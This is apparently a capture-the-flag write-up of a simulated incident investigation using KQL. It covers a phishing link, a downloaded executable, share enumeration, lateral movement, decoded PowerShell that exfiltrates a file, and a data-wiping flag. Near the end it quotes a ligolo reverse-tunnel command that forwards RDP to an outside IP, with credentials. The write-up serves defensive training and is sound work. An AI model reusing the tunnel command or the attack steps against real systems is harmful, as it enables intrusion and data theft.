search

KQL Kraken Hunt

Tools/Skills: KQL, Incident Investigation, Log Analysis, Decoding Base64-Encoded Powershell Commands

hashtag
SYNOPSIS

An alert is generated that a malicious link was clicked on by an employee.

I found the email with the malicious link & documented the sender and receiver of the email. I then identified the victim's role, hostname and ip address. From there, I was able to find the log showing the victim had clicked on the link, when he clicked on it, and then found a file that was subsequently downloaded on his computer. From there, I found that the attacker had created a remote tunnel, then performed a search on network shares. The attacker later exploited a network share to perform lateral movement within the system. After the lateral movement, the attacker performed 3 base64-encoded powershell commands. I decoded these commands and found that the attacker transferred a file out of the system and then deleted the file from the current system.

While this challenge did not go into escalation of events, at this point, if not before, I would be escalating the alert according to a company's playbook.

hashtag
SOLUTION & PROCESS

hashtag
ONBOARDING

  1. How many Craftperson Elf's are working from laptops?

    QUERIES:

    ANSWER:

    25

hashtag
CASE 1

Track down who sent and who received the malicious link, as well as the subject link of the email with the malicious link: 'http://madelvesnorthpole.org/published/search/MonthlyInvoiceForReindeerFood.docxarrow-up-right'

hashtag
QUERIES

hashtag
RESULT

SENT: cwombley@gmail.com

RECEIVED: alabaster_snowball@santaworkshopgeeseislands.org

SUBJECT LINE: “[EXTERNAL] Invoice foir reindeer food past due”

hashtag
CASE 2

Find the role, hostname and ip address of the victim.

hashtag
QUERIES:

hashtag
RESULT:

IP ADDRESS: 10.10.0.4

ROLE: Head Elf

HOSTNAME: Y1US-DESKTOP

hashtag
CASE 3

What time did the victim click on the link? Were any files downloaded after he clicked on it?

hashtag
QUERY 1 (time):

hashtag
RESULT 1 (time):

hashtag
QUERY 2 (downloaded file):

hashtag
RESULT 2 (downloaded file):

TIME (OF CLICK): 2023-12-02 10:12:42.0000

DOWNLOADED FILE NAME: giftwrap.exe

hashtag
CASE 4

Where did the attacker create a remote tunnel to? When did the attacker enumerate network shares? What hostname did the attack perform lateral movement to get to?

hashtag
Endpoint IP Address from a created Remote Tunnel

hashtag
QUERY

hashtag
RESULT:

REMOTE TUNNEL IP ADDRESS: 113.37.9.17

hashtag
Time & Hostname

hashtag
QUERY:

hashtag
RESULT 1 (TIME when attacker enumerated network shares):

hashtag
RESULT 2 (Hostname of lateral movement)

TIME (OF ENUMERATED NETWORK SHARES): 2023-12-02T16:51:44Z

HOSTNAME (OF LATERAL MOVEMENT): NorthPolefileshare

hashtag
CASE 5

Find base64 encoded powershell commands and find the name of the file that was transferred and to where.

hashtag
QUERY

hashtag
RESULT

hashtag
FURTHER STEPS

  1. I decoded the four, actually 3, base64 encoded texts in Powershell.

  1. One of the decoded messages was written in reverse, so I wrote it backwards, with some help from AI, discovering the file name.

  2. A 2nd “decoded” message was almost all numbers, which I thought was strange, so I sent it to chatgpt. ChatGPT found how it was encoded and decoded it, showing me the domain the file was sent to.

TIME (OF FIRST ATTACK): 2023-12-24T16:07:47Z

*NOTE:there was an encoded powershell command before this one, but it was a basic update, not indicative of an attack)

FILE TRANSFERRED: NaughtyNiceList.txt

DOMAIN (WHERE FILE WAS SENT): giftbox.com

hashtag
CASE 6

Determine executable and command flag

hashtag
QUERY

*I used the previous query.

hashtag
RESULT

EXECUTABLE: downwithsanta.exe

COMMAND FLAG: --wipeall

hashtag
ChatGPT Prompts/Answersarrow-up-right

hashtag
Example Prompts:

  • What signs would there be that a reverse tunnel connection with a compromised machine is made? Where would I find the IP the connection forwarded to? (Using KQL)

  • What is the timestamp when the attackers enumerated network shares on the machine?

  • What process names would be indicative of this?

  • Is this a reverse tunnel connection?

    "timestamp": 2023-12-02T11:11:29Z,

    "parent_process_name": cmd.exe,

    "parent_process_hash": 614ca7b627533e22aa3e5c3594605dc6fe6f000b0cc2b845ece47ca60673ec7f,

    "process_commandline": "ligolo" --bind 0.0.0.0:1251 --forward 127.0.0.1:3389 --to 113.37.9.17:22 --username rednose --password falalalala --no-antispoof,

    "process_name": ligolo,

    "process_hash": e9b34c42e29a349620a1490574b87865cc1571f65aa376b928701a034e6b3533,

    "hostname": Y1US-DESKTOP,

    "username": alsnowball

PreviousHoliday Hack Challenge - 2023NextAzure 101

Last updated